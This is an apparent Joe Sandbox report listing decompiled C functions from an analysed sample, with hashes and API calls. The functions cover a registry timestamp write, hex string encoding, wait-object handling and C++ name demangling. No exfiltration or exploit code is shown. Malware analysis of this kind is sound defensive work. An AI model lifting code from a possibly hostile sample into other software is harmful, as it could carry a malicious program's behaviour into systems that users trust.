Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID: CloseLocalOpenQueryTimeValuewsprintf
String ID:
API String ID: 3852505512-0
Opcode ID: dbb66ec4e40f0b96ddf8d886ab6d66ea576557e999e4472c56c1706dad51e441
Instruction ID: 1589668eb117d9c12aae7036857c9bc1fd79cd220dc98d09134ced9bc9b72130
Opcode Fuzzy Hash: dbb66ec4e40f0b96ddf8d886ab6d66ea576557e999e4472c56c1706dad51e441
Instruction Fuzzy Hash: CE414C74900208EFEB08DF94D885BEDBBB5FF48300F14C569E915AB281D779AA45CF91

Uniqueness

Uniqueness Score: -1.00%

Function 040073C0 Relevance: 7.6, APIs: 5, Instructions: 70
registrytimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E040073C0(long _a4, intOrPtr _a8, intOrPtr _a12) {
				char* _v8;
				void* _v12;
				void* _v16;
				intOrPtr _v20;
				char _v36;
				char _v52;
				long _t24;
				char* _t26;

				if(_a4 != 0 && _a8 != 0 && _a12 != 0) {
					_t24 = _a4;
					if( *((intOrPtr*)(_t24 + 0x10)) != 0) {
						_v20 = E040016F0(_a8, _a12);
						_t26 =  *0x40118a0; // 0x4013b88
						_v8 = _t26;
						E04007D20(_t26,  &_v36, 0, 0x10);
						wsprintfA( &_v36, "%u", _v20);
						_v12 = 0x80000001;
						if(( *0x401435a & 0x000000ff) != 0) {
							_v12 = 0x80000002;
						}
						_v16 = 0;
						_t24 = RegOpenKeyExA(_v12, _v8, 0, 0xf003f,  &_v16);
						if(_t24 == 0) {
							GetLocalTime( &_v52);
							RegSetValueExA(_v16,  &_v36, 0, 3,  &_v52, 0x10);
							return RegCloseKey(_v16);
						}
					}
				}
				return _t24;
			}

0x040073ca
0x040073e4
0x040073eb
0x04007401
0x04007404
0x04007409
0x04007414
0x04007429
0x04007432
0x04007442
0x04007444
0x04007444
0x0400744b
0x04007465
0x0400746d
0x04007473
0x0400748b
0x00000000
0x04007495
0x0400746d
0x040073eb
0x0400749e

APIs

wsprintfA.USER32 ref: 04007429
RegOpenKeyExA.ADVAPI32(80000001,?,00000000,000F003F,00000000), ref: 04007465
GetLocalTime.KERNEL32(?), ref: 04007473
RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 0400748B
RegCloseKey.ADVAPI32(00000000), ref: 04007495

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID: CloseLocalOpenTimeValuewsprintf
String ID:
API String ID: 3926099652-0
Opcode ID: 5b6941f17f7e1ce7d1a6ef015ad0abb591c00484f45a97b9485d98f3a3167c0d
Instruction ID: 829c9f2afe597629132b3bb77bbcf1684e2940429f06bc569247a29e29dd4590
Opcode Fuzzy Hash: 5b6941f17f7e1ce7d1a6ef015ad0abb591c00484f45a97b9485d98f3a3167c0d
Instruction Fuzzy Hash: 442112B5900208ABEB14DFA4D849FFE77B8FB48704F048558FA15AB180D77DAA44CB51

Uniqueness

Uniqueness Score: -1.00%

Function 04009650 Relevance: 7.6, APIs: 5, Instructions: 69
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04009650(intOrPtr _a4, intOrPtr _a8, CHAR* _a12, intOrPtr _a16) {
				int _v8;
				intOrPtr _v12;
				char _v20;
				int _v24;
				signed char _v25;
				void* _t58;

				_v8 = 0;
				if(_a4 != 0 && _a8 != 0 && _a12 != 0 && _a16 != 0) {
					_v12 = 0;
					_v24 = lstrlenA(_a12);
					while(_v12 < _a8 && _v24 < _a16) {
						_v25 =  *((intOrPtr*)(_a4 + _v12));
						E04007D20(_a4 + _v12,  &_v20, 0, 8);
						E04009560(_v25 & 0x000000ff,  &_v20, 7);
						_t58 = _t58 + 0x18;
						lstrcatA(_a12,  &_v20);
						_v24 = lstrlenA(_a12);
						_v12 = _v12 + 1;
					}
					if(lstrlenA(_a12) > _a16) {
						_a12[_a16] = 0;
					}
					_v8 = lstrlenA(_a12);
				}
				return _v8;
			}

0x04009656
0x04009661
0x04009685
0x04009696
0x04009699
0x040096b1
0x040096bc
0x040096cf
0x040096d4
0x040096df
0x040096ef
0x040096f8
0x040096f8
0x0400970a
0x04009712
0x04009712
0x0400971f
0x0400971f
0x04009728

APIs

lstrlenA.KERNEL32(00000000), ref: 04009690
lstrcatA.KERNEL32(00000000,00000000), ref: 040096DF
lstrlenA.KERNEL32(00000000), ref: 040096E9
lstrlenA.KERNEL32(00000000), ref: 04009701
lstrlenA.KERNEL32(00000000), ref: 04009719

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID: lstrlen$lstrcat
String ID:
API String ID: 493641738-0
Opcode ID: 8467699368807e0697c2a8f8d306fbd68601f1d2da39666beca5ff7786e62213
Instruction ID: 5d62f8ff5c671b513c9f4ed5768570a6b0eac4432c67e9f412687076ede29f23
Opcode Fuzzy Hash: 8467699368807e0697c2a8f8d306fbd68601f1d2da39666beca5ff7786e62213
Instruction Fuzzy Hash: 3D213DB1900349EFEB14CFA4D884BEE7BB5FF44305F148558E914A7281D378AA94CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00416290 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 210
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 34%

			E00416290(void* __ecx, void* __edx, char _a4, intOrPtr _a8, signed int _a12) {
				void* _v16;
				intOrPtr _v32;
				char _v36;
				signed int _v48;
				signed int _v52;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t46;
				signed int _t47;
				signed int _t48;
				signed int _t51;
				intOrPtr _t53;
				signed int _t55;
				signed int _t56;
				signed int _t59;
				signed int _t61;
				signed int _t62;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				signed int _t72;
				signed int _t73;
				signed int _t74;
				signed int _t75;
				signed int _t76;
				void* _t78;
				signed int _t79;
				signed int _t80;
				void* _t82;
				signed int _t83;
				void* _t85;
				signed int _t86;
				char _t87;
				void* _t88;
				void* _t89;
				intOrPtr* _t90;
				intOrPtr* _t91;
				intOrPtr* _t99;
				void* _t103;

				_t82 = __edx;
				_t78 = __ecx;
				_t90 = _t89 - 0x3c;
				_t87 = _a4;
				_t101 = _a8 - 1;
				_t75 = _a12;
				if(_a8 == 1) {
					_v72 = _t75;
					 *_t90 = _t87;
					_v48 = WaitForSingleObject;
					_t46 = WaitForSingleObject(??, ??);
					_t91 = _t90 - 8;
					__eflags = WaitForSingleObject - 0x80;
					if(WaitForSingleObject == 0x80) {
						_t76 = 1;
						goto L19;
					} else {
						__eflags = WaitForSingleObject - 0x102;
						if(WaitForSingleObject == 0x102) {
							_t76 = 0x8a;
							goto L19;
						} else {
							__eflags = WaitForSingleObject - 1;
							asm("sbb eax, eax");
							_t51 =  !_t46 & 0x00000016;
							__eflags = WaitForSingleObject;
							goto L15;
						}
					}
				} else {
					_v36 = _t87;
					 *_t90 = E00411DD0();
					_t53 = E00411DF0(_t101);
					_v32 = _t53;
					if(_t53 == 0) {
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							_v48 = WaitForSingleObject;
							while(1) {
								_v72 = 0x28;
								 *_t90 = _t87;
								_t55 = _v48();
								_t91 = _t90 - 8;
								__eflags = _t55 - 0x80;
								_t83 = _t55;
								if(_t55 == 0x80) {
									break;
								}
								__eflags = _t55 - 0x102;
								if(_t55 == 0x102) {
									_t59 = E00412070(_t75, _t78, _t83, _t85, _t87, _t88);
									__eflags = _t59;
									if(_t59 == 0) {
										continue;
									} else {
										goto L49;
									}
								} else {
									_t51 = 0;
									__eflags = _t83;
									_t76 = 0x16;
									if(_t83 == 0) {
										goto L15;
									} else {
										L55:
										_t56 = E00412070(_t76, _t78, _t83, _t85, _t87, _t88);
										__eflags = _t56;
										if(_t56 != 0) {
											L49:
											__eflags = _a8 - 2;
											if(_a8 == 2) {
												goto L17;
											} else {
												goto L50;
											}
										} else {
											__eflags = _t76 - 0x16;
											_t51 = 0x16;
											if(_t76 != 0x16) {
												L19:
												_v80 = 0;
												 *_t91 = _t87;
												_t47 = _v48();
												__eflags = _t47;
												if(_t47 != 0) {
													goto L10;
												} else {
													goto L20;
												}
											} else {
												goto L15;
											}
										}
									}
								}
								goto L59;
							}
							_t76 = 1;
							goto L55;
						} else {
							_t86 = 0x14;
							_v48 = WaitForSingleObject;
							do {
								__eflags = _t86 - _t75;
								_t86 =  >  ? _t75 : _t86;
								_v72 = _t86;
								 *_t90 = _t87;
								_t61 = _v48();
								_t90 = _t90 - 8;
								__eflags = _t61 - 0x80;
								if(_t61 == 0x80) {
									_t79 = 1;
									goto L30;
								} else {
									__eflags = _t61 - 0x102;
									if(_t61 == 0x102) {
										_t79 = 0x8a;
										goto L30;
									} else {
										__eflags = _t61;
										if(_t61 == 0) {
											_t79 = 0;
											__eflags = 0;
											goto L40;
										} else {
											_t79 = 0x16;
											L30:
											_t75 = _t75 - _t86;
											__eflags = _t75;
											if(_t75 != 0) {
												_v52 = _t79;
												_t62 = E00412070(_t75, _t79, _t82, _t86, _t87, _t88);
												_t80 = _v52;
												__eflags = _t62;
												if(_t62 != 0) {
													goto L17;
												} else {
													goto L37;
												}
											} else {
												L31:
												__eflags = _t79 - 0x8a;
												if(_t79 != 0x8a) {
													L40:
													__eflags = _t79;
													if(_t79 != 0) {
														goto L33;
													} else {
														_t64 = _t79;
														goto L35;
													}
												} else {
													_v52 = _t79;
													_v80 = 0;
													 *_t90 = _t87;
													_t65 = _v48();
													_t79 = _v52;
													__eflags = _t65;
													if(_t65 == 0) {
														goto L20;
													} else {
														L33:
														__eflags = _a8 - 2;
														if(_a8 != 2) {
															_v48 = _t79;
															E00412210();
															_t51 = _v48;
															goto L15;
														} else {
															_t64 = _t79;
															L35:
															return _t64;
														}
													}
												}
											}
										}
									}
								}
								goto L59;
								L37:
								__eflags = _t80 - 0x8a;
							} while (_t80 == 0x8a);
							goto L31;
						}
					} else {
						while(1) {
							_v64 = _t75;
							_v68 = 0;
							_v72 =  &_v36;
							 *_t90 = 2;
							_t67 = WaitForMultipleObjects(??, ??, ??, ??);
							_t99 = _t90 - 0x10;
							_t103 = _t67 - 1;
							if(_t103 != 0) {
								break;
							}
							 *_t99 = _v32;
							ResetEvent(??);
							_t90 = _t99 - 4;
							__eflags = _a8 - 2;
							if(_a8 != 2) {
								L50:
								E00412210();
								_t51 = 0x16;
								L15:
								return _t51;
							} else {
								E00412210();
								continue;
							}
							goto L59;
						}
						if(_t103 < 0) {
							_t48 = 0;
							goto L11;
						} else {
							if(_t67 == 0x80) {
								_t76 = 1;
								goto L7;
							} else {
								if(_t67 != 0x102) {
									__eflags = _a8 - 2;
									_t76 = 0x16;
									_t73 = _t67 & 0xffffff00 | _a8 != 0x00000002;
									goto L9;
								} else {
									_t76 = 0x8a;
									L7:
									_v72 = 0;
									 *_t99 = _v36;
									_t72 = WaitForSingleObject(??, ??);
									if(_t72 == 0) {
										L20:
										__eflags = 0;
										return 0;
									} else {
										_t73 = _t72 & 0xffffff00 | _a8 != 0x00000002;
										L9:
										if(_t73 != 0) {
											_t74 = E00412070(_t76, _t78, _t82, _t85, _t87, _t88);
											_t51 = _t76;
											__eflags = _t74;
											if(_t74 == 0) {
												goto L15;
											} else {
												L17:
												return 0x16;
											}
										} else {
											L10:
											_t48 = _t76;
											L11:
											return _t48;
										}
									}
								}
							}
						}
					}
				}
				L59:
			}

0x00416290
0x00416290
0x00416296
0x00416299
0x0041629c
0x004162a0
0x004162a3
0x0041634a
0x0041634e
0x00416351
0x00416354
0x00416356
0x00416359
0x0041635e
0x004164e0
0x00000000
0x00416364
0x00416364
0x00416369
0x004163a0
0x00000000
0x0041636b
0x0041636b
0x0041636e
0x00416372
0x00416372
0x00000000
0x00416372
0x00416369
0x004162a9
0x004162a9
0x004162b1
0x004162b4
0x004162bb
0x004162be
0x004163f0
0x004163f3
0x0041652c
0x00416530
0x00416530
0x00416538
0x0041653b
0x0041653e
0x00416541
0x00416546
0x00416548
0x00000000
0x00000000
0x0041654a
0x0041654f
0x00416505
0x0041650a
0x0041650c
0x00000000
0x00000000
0x00000000
0x00000000
0x00416551
0x00416551
0x00416553
0x00416555
0x0041655a
0x00000000
0x00416560
0x00416560
0x00416560
0x00416565
0x00416567
0x0041650e
0x0041650e
0x00416512
0x00000000
0x00000000
0x00000000
0x00000000
0x00416569
0x00416569
0x0041656c
0x00416571
0x004163a5
0x004163a5
0x004163ad
0x004163b0
0x004163b6
0x004163b8
0x00000000
0x00000000
0x00000000
0x00000000
0x00416577
0x00000000
0x00416577
0x00416571
0x00416567
0x0041655a
0x00000000
0x0041654f
0x00416580
0x00000000
0x004163f9
0x004163fe
0x00416403
0x00416406
0x00416406
0x00416408
0x0041640b
0x0041640f
0x00416412
0x00416415
0x00416418
0x0041641d
0x004164d0
0x00000000
0x00416423
0x00416423
0x00416428
0x004164c0
0x00000000
0x0041642e
0x0041642e
0x00416430
0x004164a0
0x004164a0
0x00000000
0x00416432
0x00416432
0x00416437
0x00416437
0x00416437
0x00416439
0x00416478
0x0041647b
0x00416480
0x00416483
0x00416485
0x00000000
0x00000000
0x00000000
0x00000000
0x0041643b
0x0041643b
0x0041643b
0x00416441
0x004164a2
0x004164a2
0x004164a4
0x00000000
0x004164a6
0x004164a6
0x00000000
0x004164a6
0x00416443
0x00416443
0x00416446
0x0041644e
0x00416451
0x00416454
0x0041645a
0x0041645c
0x00000000
0x00416462
0x00416462
0x00416462
0x00416466
0x004164aa
0x004164ad
0x004164b5
0x00000000
0x00416468
0x00416468
0x00416470
0x00416477
0x00416477
0x00416466
0x0041645c
0x00416441
0x00416439
0x00416430
0x00416428
0x00000000
0x0041648b
0x0041648b
0x0041648b
0x00000000
0x00416497
0x004162c4
0x004162c4
0x004162c7
0x004162cb
0x004162d3
0x004162d7
0x004162de
0x004162e4
0x004162e7
0x004162ea
0x00000000
0x00000000
0x004163d0
0x004163d3
0x004163d9
0x004163dc
0x004163e0
0x00416518
0x00416518
0x0041651d
0x00416375
0x0041637c
0x004163e6
0x004163e6
0x00000000
0x004163e6
0x00000000
0x004163e0
0x004162f0
0x004163c6
0x00000000
0x004162f6
0x004162fb
0x004164fb
0x00000000
0x00416301
0x00416306
0x004164ea
0x004164ee
0x004164f3
0x00000000
0x0041630c
0x0041630c
0x00416311
0x00416314
0x0041631c
0x0041631f
0x0041632a
0x004163ba
0x004163bd
0x004163c3
0x00416330
0x00416334
0x00416337
0x00416339
0x00416380
0x00416387
0x00416389
0x0041638b
0x00000000
0x0041638d
0x0041638d
0x00416399
0x00416399
0x0041633b
0x0041633b
0x0041633b
0x0041633d
0x00416344
0x00416344
0x00416339
0x0041632a
0x00416306
0x004162fb
0x004162f0
0x004162be
0x00000000

APIs

WaitForMultipleObjects.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00411205,FFFFFFFF,?,00413F5C), ref: 004162DE
WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00411205), ref: 0041631F
ResetEvent.KERNEL32 ref: 004163D3

Strings

(, xrefs: 00416530

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: Wait$EventMultipleObjectObjectsResetSingle
String ID: (
API String ID: 256776027-3887548279
Opcode ID: b4733ac531acf217bfbfdf5bd4e52257d9b599610da1baf24221a20e7f36d5fc
Instruction ID: 33d5a718a10795f4640d15a2a31863235bdb1fdf0ba6d8b48b186967bb3fffd1
Opcode Fuzzy Hash: b4733ac531acf217bfbfdf5bd4e52257d9b599610da1baf24221a20e7f36d5fc
Instruction Fuzzy Hash: A9618E71A042089BDF209FA9D5493EEB7A1EB44314F12853BEDA5D7380DB3DC885CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00413170 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 119COMMON

Download Yara Rule

APIs

GetHandleInformation.KERNEL32 ref: 004131CB
CloseHandle.KERNEL32 ref: 00413283
CloseHandle.KERNEL32 ref: 00413299

Strings

h%, xrefs: 004131A1, 004131D8, 004131FC, 00413234, 0041325C, 004132D2, 00413306, 0041332C

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: Handle$Close$Information
String ID: h%
API String ID: 279656618-2361359942
Opcode ID: 5e26eb2f082092fd93500816398500556912164adaf229db355610f07e92ddda
Instruction ID: a911b25d2829e27f16f5e7be5a38597ebe99eb268f763eb2544e6e4d7d967738
Opcode Fuzzy Hash: 5e26eb2f082092fd93500816398500556912164adaf229db355610f07e92ddda
Instruction Fuzzy Hash: F2414AB07043059BDB10EFA5D68439ABBF4AF04345F40887EE8859B345D778DA85CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0040C8A0 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON

Download Yara Rule

APIs

strlen.NTDLL ref: 0040C935
memcpy.NTDLL ref: 0040C950
free.MSVCRT ref: 0040C95A

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: freememcpystrlen
String ID:
API String ID: 2208669145-0
Opcode ID: b95072503d289b122270171115fbda5e346781793e070ee70b941499e8d717ba
Instruction ID: ef56fa0fe3e4a126f61911e2a387ce4b2f316110e497464169164f036395c722
Opcode Fuzzy Hash: b95072503d289b122270171115fbda5e346781793e070ee70b941499e8d717ba
Instruction Fuzzy Hash: F7312DB2208701CBC710AF69D4C072BBBE5EBD5364F140A3EE994A73D0D779D8458B9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040B820 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 246
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040B820(signed char __eax, signed char* __ecx, signed char* __edx) {
				signed char _t104;
				void* _t107;
				void* _t110;
				signed char _t113;
				intOrPtr _t117;
				void* _t120;
				signed char _t121;
				int _t125;
				signed char _t126;
				signed char* _t137;
				char* _t138;
				signed char* _t139;
				char* _t140;
				signed int _t141;
				signed char _t149;
				signed char _t151;
				signed int _t152;
				signed char _t153;
				signed char _t159;
				signed int _t161;
				signed int _t162;
				signed char _t163;
				signed char* _t167;
				signed char* _t168;
				signed char* _t169;
				signed char* _t170;
				intOrPtr* _t172;
				signed char* _t173;
				void* _t174;
				signed char** _t175;

				_t104 = __eax;
				_t137 = __ecx;
				_t175 = _t174 - 0x4c;
				_t175[5] = __edx;
				_t170 = _t175[0x18];
				if(__ecx == 0) {
					L12:
					return _t104;
				} else {
					_t169 = __eax;
					_t104 =  *(__eax + 0x118);
					if(_t104 == 0) {
						do {
							if(_t137[8] != 0) {
								L11:
								_t137 =  *_t137;
								if(_t137 != 0) {
									goto L3;
								} else {
									goto L12;
								}
							} else {
								_t143 = _t137[4];
								_t104 =  *(_t137[4]);
								if(_t170 != 0 || _t104 - 0x1c > 4) {
									_t137[8] = 1;
									_t167 = _t169[0x110];
									_t169[0x110] = _t137[0xc];
									if(_t104 == 0x29) {
										 *_t175 =  *_t137;
										_t107 = E0040BE20(_t169, _t143 + 8, _t175[5]);
										_t169[0x110] = _t167;
										return _t107;
									} else {
										if(_t104 == 0x2a) {
											 *_t175 =  *_t137;
											_t110 = E0040BBA0(_t169, _t143 + 4, _t175[5]);
											_t169[0x110] = _t167;
											return _t110;
										} else {
											if(_t104 == 2) {
												_t169[0x114] = 0;
												E0040B090(_t169,  *((intOrPtr*)(_t143 + 4)), _t175[5]);
												_t113 = _t169[0x100];
												if((_t175[5] & 0x00000004) != 0) {
													if(_t113 == 0xff) {
														_t169[0xff] = 0;
														_t175[1] = 0xff;
														 *_t175 = _t169;
														_t175[2] = _t169[0x10c];
														_t169[0x108]();
														_t159 = 1;
														_t113 = 0;
														_t169[0x120] = _t169[0x120] + 1;
													} else {
														_t159 = _t113 + 1;
													}
													_t169[0x100] = _t159;
													_t169[_t113] = 0x2e;
													_t169[0x104] = 0x2e;
												} else {
													_t173 = 0x41fa44;
													_t175[6] = _t137;
													while(1) {
														_t141 =  *_t173 & 0x000000ff;
														if(_t113 != 0xff) {
															_t153 = _t113 + 1;
														} else {
															_t169[0xff] = 0;
															_t175[1] = 0xff;
															 *_t175 = _t169;
															_t175[2] = _t169[0x10c];
															_t169[0x108]();
															_t153 = 1;
															_t113 = 0;
															_t169[0x120] = _t169[0x120] + 1;
														}
														_t173 =  &(_t173[1]);
														_t169[0x100] = _t153;
														_t169[_t113] = _t141;
														_t169[0x104] = _t141;
														if(_t173 == 0x41fa46) {
															break;
														}
														_t113 = _t153;
													}
													_t137 = _t175[6];
												}
												_t172 =  *((intOrPtr*)(_t137[4] + 8));
												_t117 =  *_t172;
												if(_t117 == 0x45) {
													_t121 = _t169[0x100];
													_t138 = "{default arg#";
													while(1) {
														_t161 =  *_t138 & 0x000000ff;
														if(_t121 != 0xff) {
															_t149 = _t121 + 1;
														} else {
															_t169[0xff] = 0;
															_t175[6] = _t161;
															_t175[1] = 0xff;
															_t175[2] = _t169[0x10c];
															 *_t175 = _t169;
															_t169[0x108]();
															_t149 = 1;
															_t121 = 0;
															_t169[0x120] = _t169[0x120] + 1;
															_t161 = _t175[6];
														}
														_t138 =  &(_t138[1]);
														_t169[0x100] = _t149;
														_t169[_t121] = _t161;
														_t169[0x104] = _t161;
														if(_t138 == 0x41fa54) {
															break;
														}
														_t121 = _t149;
													}
													_t139 =  &(_t175[9]);
													_t175[1] = "%ld";
													 *_t175 = _t139;
													_t175[2] =  *((intOrPtr*)(_t172 + 8)) + 1;
													sprintf(??, ??);
													 *_t175 = _t139;
													_t125 = strlen(??);
													if(_t125 == 0) {
														_t126 = _t169[0x100];
													} else {
														_t163 = _t169[0x100];
														_t175[6] = _t167;
														_t168 =  &(_t139[_t125]);
														while(1) {
															_t152 =  *_t139 & 0x000000ff;
															if(_t163 != 0xff) {
																_t126 = _t163 + 1;
															} else {
																_t169[0xff] = 0;
																_t175[7] = _t152;
																_t175[1] = 0xff;
																_t175[2] = _t169[0x10c];
																 *_t175 = _t169;
																_t169[0x108]();
																_t126 = 1;
																_t163 = 0;
																_t169[0x120] = _t169[0x120] + 1;
																_t152 = _t175[7];
															}
															_t139 =  &(_t139[1]);
															_t169[0x100] = _t126;
															_t169[_t163] = _t152;
															_t169[0x104] = _t152;
															if(_t139 == _t168) {
																break;
															}
															_t163 = _t126;
														}
														_t167 = _t175[6];
													}
													_t140 = "}::";
													while(1) {
														_t162 =  *_t140 & 0x000000ff;
														if(_t126 != 0xff) {
															_t151 = _t126 + 1;
														} else {
															_t169[0xff] = 0;
															_t175[6] = _t162;
															_t175[1] = 0xff;
															_t175[2] = _t169[0x10c];
															 *_t175 = _t169;
															_t169[0x108]();
															_t151 = 1;
															_t126 = 0;
															_t169[0x120] = _t169[0x120] + 1;
															_t162 = _t175[6];
														}
														_t140 =  &(_t140[1]);
														_t169[0x100] = _t151;
														_t169[_t126] = _t162;
														_t169[0x104] = _t162;
														if(_t140 == 0x41fa5c) {
															L28:
															_t172 =  *((intOrPtr*)(_t172 + 4));
															_t117 =  *_t172;
															goto L29;
														} else {
															_t126 = _t151;
															continue;
														}
														L30:
														_t120 = E0040B090(_t169, _t172, _t175[5]);
														_t169[0x110] = _t167;
														return _t120;
														goto L53;
													}
												}
												L29:
												if(_t117 - 0x1c <= 4) {
													goto L28;
												}
												goto L30;
											} else {
												_t104 = E0040B0B0(_t169, _t143, _t175[5]);
												_t169[0x110] = _t167;
												goto L11;
											}
										}
									}
								} else {
									goto L11;
								}
							}
							goto L53;
							L3:
							_t104 = _t169[0x118];
						} while (_t104 == 0);
					} else {
					}
					goto L12;
				}
				L53:
			}

0x0040b820
0x0040b824
0x0040b826
0x0040b82b
0x0040b82f
0x0040b833
0x0040b8a1
0x0040b8a8
0x0040b835
0x0040b835
0x0040b837
0x0040b83f
0x0040b84d
0x0040b852
0x0040b89b
0x0040b89b
0x0040b89f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040b854
0x0040b854
0x0040b859
0x0040b85b
0x0040b86b
0x0040b872
0x0040b878
0x0040b87e
0x0040b8b2
0x0040b8b7
0x0040b8bc
0x0040b8c9
0x0040b880
0x0040b883
0x0040b8d3
0x0040b8d8
0x0040b8dd
0x0040b8ea
0x0040b885
0x0040b888
0x0040b8f3
0x0040b904
0x0040b909
0x0040b91a
0x0040b988
0x0040b9e3
0x0040b9ea
0x0040b9f2
0x0040b9f5
0x0040b9f9
0x0040b9ff
0x0040ba04
0x0040ba06
0x0040b98a
0x0040b98a
0x0040b98a
0x0040b98d
0x0040b993
0x0040b997
0x0040b91c
0x0040b91c
0x0040b921
0x0040b946
0x0040b94b
0x0040b94f
0x0040b927
0x0040b951
0x0040b957
0x0040b95e
0x0040b966
0x0040b969
0x0040b96d
0x0040b973
0x0040b978
0x0040b97a
0x0040b97a
0x0040b92a
0x0040b933
0x0040b939
0x0040b93c
0x0040b942
0x00000000
0x00000000
0x0040b944
0x0040b944
0x0040b9a0
0x0040b9a0
0x0040b9a7
0x0040b9aa
0x0040b9b0
0x0040ba17
0x0040ba1d
0x0040ba40
0x0040ba45
0x0040ba48
0x0040ba21
0x0040ba4a
0x0040ba50
0x0040ba57
0x0040ba5b
0x0040ba63
0x0040ba67
0x0040ba6a
0x0040ba70
0x0040ba75
0x0040ba77
0x0040ba7e
0x0040ba7e
0x0040ba24
0x0040ba2d
0x0040ba33
0x0040ba36
0x0040ba3c
0x00000000
0x00000000
0x0040ba3e
0x0040ba3e
0x0040ba87
0x0040ba8b
0x0040ba93
0x0040ba99
0x0040ba9d
0x0040baa2
0x0040baa5
0x0040baac
0x0040bb96
0x0040bab2
0x0040bab4
0x0040baba
0x0040babe
0x0040badd
0x0040bae3
0x0040bae6
0x0040bac2
0x0040bae8
0x0040baee
0x0040baf5
0x0040baf9
0x0040bb01
0x0040bb05
0x0040bb08
0x0040bb0e
0x0040bb13
0x0040bb15
0x0040bb1c
0x0040bb1c
0x0040bac5
0x0040baca
